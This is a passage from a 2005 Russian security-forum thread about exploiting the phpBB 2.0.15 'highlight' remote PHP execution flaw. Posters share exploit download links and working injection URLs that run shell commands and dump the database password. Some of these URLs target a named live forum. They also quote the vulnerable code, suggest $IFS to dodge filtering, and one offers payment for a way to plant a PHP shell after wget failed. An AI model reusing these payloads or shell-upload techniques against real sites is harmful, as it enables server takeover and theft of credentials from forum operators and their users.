Security Lab



Поиск  Пользователи  Правила 
Закрыть
Логин:
Пароль:
Забыли свой пароль?
Войти  
Форум » Обсуждение статей (закрыто) » Обсуждение публикаций
Страницы: Пред. 1 2 3 След.
RSS
Выполнение произвольного PHP сценария в phpBB в коде highlighting
 
#21
Это нравится:0Да/0Нет
30.06.2005 23:24:24
Вот и у меня тоже самое, у меня тоже есть один не оконченный взлом, вот сейчас момент такой а сплоит написать нифига не получается.
 
 
 
#22
Это нравится:0Да/0Нет
30.06.2005 23:25:42
Может попробовать поставить между командами $IFS ?
 
 
 
#23
Это нравится:0Да/0Нет
30.06.2005 23:40:22
Цитата
Transmutagen пишет:
Может попробовать поставить между командами $IFS ?

помогает, но не везде. =(
 
 
 
#24
Это нравится:0Да/0Нет
01.07.2005 01:15:22
чуточку переделаный сплоит от версии 2.0.10
http://iron.vzletka.net/spl.txt
работает, проверено
 
 
 
#25
Это нравится:0Да/0Нет
01.07.2005 02:15:18
Люди! Не понимаю чего паритесь! Написанно же: уязвимость 2.0.15, а не <=2.0.15! Вот там все и работает! даже не нужно изобретать велосипед!

Пример: target/forum/viewtopic.php?p=2&highlight=%27.$poster=ls -al.%27
 
 
 
#26
Это нравится:0Да/0Нет
01.07.2005 02:29:29
Млин! Форум апострофы проглотил! =\

Пример такой: target/forum/viewtopic.php?p=2&highlight=%27.$poster=%60ls -al%60.%27

PS: Приведу код злополучного "исправления" для 2.0.14, из-за которого и появилась бага:

Код
# 
#-----[ OPEN ]--------------------------------------------- 
# 
viewtopic.php

#
#-----[ FIND ]---------------------------------------------
# Line 1110
 &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $message = str_replace(\", ", substr(@preg_replace(#(\>(((?>([^><]+|(?R)))*)\<))#se, "@preg_replace(#\b(" . $highlight_match . ")\b#i, <span style=\"color:#" . $theme[fontcolor3] . "\"><b>\\\\1</b></span>, \\0)", > . $message . <), 1, -1));

#
#-----[ REPLACE WITH ]---------------------------------------------
# 
 &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $message = str_replace(\", ", substr(@preg_replace(#(\>(((?>([^><]+|(?R)))*)\<))#se, "@preg_replace(#\b(" . str_replace(\\, \\\\, $highlight_match) . ")\b#i, <span style=\"color:#" . $theme[fontcolor3] . "\"><b>\\\\1</b></span>, \\0)", > . $message . <), 1, -1));
 
 
 
#27
Это нравится:0Да/0Нет
01.07.2005 06:34:48
в версии 2.0.14 уязвимости нет!
Код
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$words = explode( , trim(htmlspecialchars($HTTP_GET_VARS[highlight])));

вот это стоит перед этим.
 
 
 
#28
Это нравится:0Да/0Нет
01.07.2005 08:22:06
http://www.digitalsec.net/stuff/olds/phpbb2_0_15.pl
 
 
 
#29
Это нравится:0Да/0Нет
01.07.2005 11:52:53
Кривой сплойт у дигитал секурити. Я его переписал немного. Сегодня появится в журнале mazafaka.ru .
Сплойт от дигитал секурити результаты выводит криво, до жути.
Так что следите за рекламой :)
 
 
 
#30
Это нравится:0Да/0Нет
01.07.2005 15:57:47
Плохо. Уязвимость позволяет выполнить PHP команды на сервере.
Примеры:
http://russian-belgium.be/viewtopic.php?t=14497&&highlight=% 27.$poster=print(Доброе%09утро%09Admin%20).%27

http://russian-belgium.be/viewtopic.php?t=14497&&highlight=% 27.$poster=$dbpasswd.%27

Срочно лечим!
 
 
 
#31
Это нравится:0Да/0Нет
02.07.2005 13:20:19
товарищи из phpBB перестали писать версию борды в копирайтах..
искать нужную версию стало сложнее... [IMG]http://www.securitylab.ru/forum/smileys/smiley7.gif[/IMG]
 
 
 
#32
Это нравится:0Да/0Нет
02.07.2005 14:16:25
Ыыы, я еще во времена 2.0.10 прописал на начало функции highlight die(); Как вижу не зря.
 
 
 
#33
Это нравится:0Да/0Нет
02.07.2005 15:10:13
Хм. Что-ТО мне не везет, все форумы мне почему-то не узявимые попадаются. Пользуюсь эксплоитом предоставленным Poiz0nом, не выполняются команды :(.

Если кто нашел уязвимый форум, киньте линк плиз в личку, проверить все-таки хочется... а то может проблемы у меня.
 
 
 
#34
Это нравится:0Да/0Нет
02.07.2005 16:34:44
Сплоит конектится к серваку, но команды не выполняются. он их просто проглатывает без вывода инфы в консоль :( Почему?
 
 
 
#35
Это нравится:0Да/0Нет
02.07.2005 19:18:08
Обсолютно такая же ситуация. Почему так происходит. ls -la он проглоти, подумал, ждет новой команды.
 
 
 
#36
Это нравится:0Да/0Нет
03.07.2005 02:14:46
Ребяты а сохранились у кого-нибудь статьи о взломе phpbb 2.0.4 ??
 
 
 
#37
Это нравится:0Да/0Нет
03.07.2005 02:57:39
кстати есть ли способ узнать реальную версию phpbb?

xttp://www.abhazia.com/phpBB/ вот какая у них версия?
 
 
 
#38
Это нравится:0Да/0Нет
03.07.2005 13:02:49
На пхп есть у кого эксплойт?
А то я в перле не волоку :(
 
 
 
#39
Это нравится:0Да/0Нет
04.07.2005 21:48:44
прикольная уязвимость... :)
 
 
 
#40
Это нравится:0Да/0Нет
05.07.2005 03:52:16
kto nibud znaet robochiy sposob zalit php shell na 2.0.15 s pravami nobody. WGET nerabotaet, hotya rabotaet esli v /tmp (mogno ego kakto ot tuda skopirovat?) , Cherez bazu output into outfile toge neprohodit, cherez INCLUDE pitalsya neche nesmog. Please pomogite esli est robochiy sposob. srazu poshlu 50 wmz esli rasskagite rabochiy sposob. mogu s protekciey pered informaciey. spasibo badstan@gmail.com
 
 
 
Страницы: Пред. 1 2 3 След.
Читают тему